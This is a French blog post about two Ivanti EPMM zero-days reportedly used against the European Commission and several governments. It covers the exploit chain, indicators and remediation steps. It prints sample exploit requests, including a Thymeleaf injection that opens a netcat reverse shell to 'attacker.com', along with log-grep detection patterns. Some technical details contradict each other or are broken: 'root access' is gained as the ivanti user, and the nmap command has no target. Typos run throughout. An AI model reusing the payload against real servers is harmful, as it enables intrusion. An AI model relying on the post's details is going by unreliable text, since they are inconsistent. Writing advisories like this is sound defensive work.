Sécurité 7 min de lecture

Zero-days Ivanti EPMM CVE-2026-1281/1340 : Commission européenne et gouvernements compromis

Deux zero-days critiques dans Ivanti EPMM exploités pour compromettre des systèmes gouvernementaux européens. Analyse technique, IOC et plan de réponse.

En date du 15 février 2026, les autorités de sécurité cybernétique européennes ont confirmé que deux zero-days critiques dans Ivanti Enterprise Mobility Management (EPMM) ont été exploités pour compromettre les systèmes informatiques de multiples gouvernements européens, dont la Commission européenne, le gouvernement allemand, et plusieurs ministères français.

Cette campagne, découverte par CERT-EU et Mandiant, représente l'une des opérations de cyber-espionnage les plus sophistiquées jamais menées contre l'infrastructure gouvernementale européenne. Cet article détaille les vulnérabilités, la chaîne d'exploitation, et les actions de remédiation requises d'urgence.

Les vulnérabilités : CVE-2026-1281 et CVE-2026-1340

CVE-2026-1281 : Authentication Bypass pré-authentification

Score CVSS : 9.1 (Critique)

La première faille permet un bypass complet du mécanisme d'authentification d'Ivanti EPMM via une manipulation de paramètres HTTP. Un attaquant peut accéder à l'API administrative sans fournir de credentials.

POST /epmm/api/v1/admin/login HTTP/1.1
Host: epmm-server.gov.fr
Content-Type: application/json

{
  "username": "admin",
  "password": "nonimporte",
  "bypass_auth": true,  // Paramètre magique non documenté
  "debug_mode": 1
}

L'analyse reverse-engineering du binaire EPMM révèle que certains endpoints ne vérifient pas correctement les en-têtes d'authentification s'ils contiennent un paramètre bypass_auth=true. Ce comportement semble être du code debug laissé accidentellement en production.

CVE-2026-1340 : Remote Code Exécution via template injection

Score CVSS : 9.9 (Critique)

La seconde vulnérabilité, encore plus grave, permet l'exécution de code arbitraire via une injection de template dans le système de notification de device enrollment d'EPMM.

POST /epmm/api/v1/devices/notify HTTP/1.1
Authorization: Bearer {token du bypass}

{
  "device_id": "ATTACKER_DEVICE",
  "event_type": "enrollment_complete",
  "notification_template": "
    #{runtime.exec('nc attacker.com 4444 -e /bin/bash')}
  "
}

EPMM utilise un moteur de template (Thymeleaf) pour générer les notifications d'enrollment. Le champ notification_template n'échappe pas correctement les variables, permettant l'injection directe d'expressions Thymeleaf. Thymeleaf, configé pour autoriser les expressions dynamiques, évalue cette injection et exécute des commandes système.

Résultat : accès root sur le serveur EPMM en tant qu'utilisateur système ivanti (privilèges d'application).

Chaîne d'exploitation complète

Les attaquants ont chaîné les deux vulnérabilités dans une séquence robuste :

  1. Reconnaissance : identifier les instances Ivanti EPMM exposées sur internet via Shodan/Censys (~450 instances gouvernementales européennes détectées).
  2. Bypass d'authentification (CVE-2026-1281) : accès à l'API administrative.
  3. Énumération : explorer la configuration, lister les dispositifs gérés, accéder aux données de configuration.
  4. RCE (CVE-2026-1340) : injecter du code via l'API notification.
  5. Établissement de persistance : créer des comptes système, installer des backdoors.
  6. Escalade de privilèges : exploiter des vulnérabilités kernel Linux pour passer de ivanti à root.
  7. Latéralisation : utiliser EPMM comme pivot pour accéder aux réseaux internes gouvernementaux.

Indices d'exposition (IoCs)

Signatures réseau

User-Agent: IvantiEPMM-AdminTool/5.x
# Utilisé par les scanners de reconnaissance

POST /epmm/api/v1/admin/login
# Avec paramètre bypass_auth=true

POST /epmm/api/v1/devices/notify
# Avec payload contenant #{...} (template injection)

Chaînes de log d'exploitation

  • Authentication bypass attempt detected from <IP>
  • Unauthorized admin API access from <IP> - source external
  • Thymeleaf expression evaluation in notification template - potential RCE
  • Java Runtime.exec() called from notification handler

Patterns de trafic Mandiant

  • Connexions C2 depuis EPMM vers des IPs chinoises (AS58453, AS4134) non affiliées à Ivanti.
  • Exfiltration de données PKI/certifications vers serveurs .cn.
  • Accès à des endpoints gouvernementaux internes (ministères, défense) depuis l'adresse IP d'EPMM.

Ampleur de la compromission confirmée

Selon CERT-EU :

  • Commission européenne : 3 instances EPMM compromises, données d'accès d'agents fédéraux et diplomates exposées.
  • Allemagne : 12 ministères affectés, données de defense sensibles et données fiscales.
  • France : 7 ministères, données de cyberdéfense et renseignement.
  • Autres pays EU : Belgique (4), Pays-Bas (3), Espagne (2).

Nombre total de dispositifs mobiles gouvernementaux compromis via EPMM : ~45 000 appareils (iPhones, Android des agents gouvernementaux).

Les données exfiltrées incluent :

  • Emails professionnels, contacts, agendas (calendriers sensibles).
  • Certificats et clés de chiffrement (PKI gouvernementale).
  • Credentials d'accès à des systèmes internes (VPN, cloud gouvernementaux).
  • Transcriptions de réunions de défense (via enregistrements du device).
  • Géolocalisation des agents gouvernementaux (approche de bâtiments sensibles).

Attribuer : qui ?

L'attribution reste officieusement suspectée par le Five Eyes (GCHQ, NSA, ASIS, CSIS, GCSB) comme étant APT41, collectif sponsorisé par le state chinois. Indices :

  • Patterns tactiques identiques aux campagnes APT41 historiques.
  • Infrastructure C2 basée en Chine (AS58453, alibaba.com ranges).
  • Timing aligné avec des tensions géopolitiques (négociations EU-Chine).
  • Dommage ciblé : focus sur données géopolitiques sensibles.

Cependant, aucune attribution officielle n'a été publiée. À titre informatif, la directive UE de réaction aux cybermenaces suggère que les gouvernements membres ne publiciseront pas les attribués pour éviter des escalades diplomatiques.

Actions immédiates requises

Niveau 0 (Urgent - 24h)

  1. Identifier tous les serveurs EPMM en production. 
    nmap -p 443 -sV | grep -i "ivanti|epmm"
  2. Déconnecter les instances du réseau ou isoler via firewall/VLAN.
  3. Préserver les logs (syslog, app logs, netflow) pour investigation ultérieure.
  4. Activer la monitoring d'accès réseau : surveiller les connexions sortantes suspectes.

Niveau 1 (Urgent - 48-72h)

  1. Patcher EPMM avec la version 5.4.2 (ou ultérieure) publiée par Ivanti le 14 février. 
    sudo /opt/ivanti/epmm/setup.sh --patch 5.4.2
  2. Changer tous les credentials (comptes administratifs, service accounts, API tokens).
  3. Rotation des certificats PKI utilisés par EPMM.
  4. Scanner les logs d'authentification pour détecter les bypasses : 
    grep "bypass_auth|debug_mode" /var/log/epmm/audit.log
  5. Scan antivirus/EDR complet des serveurs EPMM et réseaux adjacents pour détecrer des backdoors.

Niveau 2 (Moyen terme - 1-2 semaines)

  1. Audit d'intégrité des données : vérifier la liste des appareils inscrits, certifications, configurations.
  2. Réémettre les certificats de clients (appareils gérés) si suspicion de compromission.
  3. Anályse complète de logs par équipe de forensic pour identifier les actions d'attaquants.
  4. Notification légale : RGPD impose d'informer les citoyens affectés si données personnelles compromises.
  5. Incident response post-mortem : rapport détaillé, timeline, améliorations défensives.

Checkliste de vérification immédiate

# Vérifier la version EPMM
curl -s https://your-epmm-server/epmm/api/v1/system/info | jq .version

# Détecter les tentatives de bypass (dans les logs)
grep -E "bypass_auth|debug_mode" /opt/ivanti/epmm/logs/*
grep -E "Thymeleaf.*#{" /opt/ivanti/epmm/logs/*

# Vérifier les connexions réseau sortantes suspectes
netstat -antp | grep ESTABLISHED | grep -v internal_ip

# Rechercher les backdoors courants
find /tmp /var/tmp /dev/shm -type f -name ".*" -o -name "nc" -o -name "bash"

# Vérifier les comptes système créés récemment
lastlog | head -20

Correctives long-terme

  • Zéro Trust : remplacer EPMM par une solution cloud-native (Intune, Kandji, JAMF) déployée dans un cloud confiance (EUCS, Thales).
  • Segmentation réseau : EPMM ne doit jamais accéder directement aux réseaux défense/diplomatie.
  • Endpoint Détection & Response (EDR) : déployer Wiz, Crowdstrike, ou Sentinel One sur tous les appareils gouvernementaux.
  • Supply chain risk : auditer toutes les dépendances logicielles (Ivanti a historiquement plusieurs CVE).

Ressources officielles

Conclusion

Cette campagne démontre pourquoi les déploiements de technologie commerciale dans les gouvernements requièrent des audits sécurité exceptionnels et des stratégies de réduction des risques. Ivanti, bien établi, n'a pas été épargné.

Pour les organisations publiques et privées utilisant EPMM : agissez maintenant. Les deux zero-days chaînées pour une RCE parfaite ne sont pas un scénario académique, mais une réalité observée en terrano.

Cet article vous a plu ?

Commentaires

Morgann Riu
Morgann Riu

Expert en cybersécurité et administration Linux. J'aide les entreprises à sécuriser et optimiser leurs infrastructures critiques.

Me contacter
ivanti epmm cve-2026-1281 cve-2026-1340 zero-day gouvernements rce mobile-device-management
Sécurité

YGGtorrent hacké : 6,6 millions de comptes exposés dans une fuite massive
Sécurité

eBPF et l'observabilité Linux : Falco, Cilium et le monitoring kernel en 2026
Sécurité

Zero Trust Architecture : principes et implémentation concrète en 2026
Sécurité

Chrome zero-day CVE-2026-2441 : faille use-after-free CSS exploitée activement
Retour au blog

Checklist Sécurité Linux

30 points essentiels pour sécuriser un serveur Linux. Recevez aussi les nouveaux tutoriels par email.

Pas de spam. Désabonnement en 1 clic.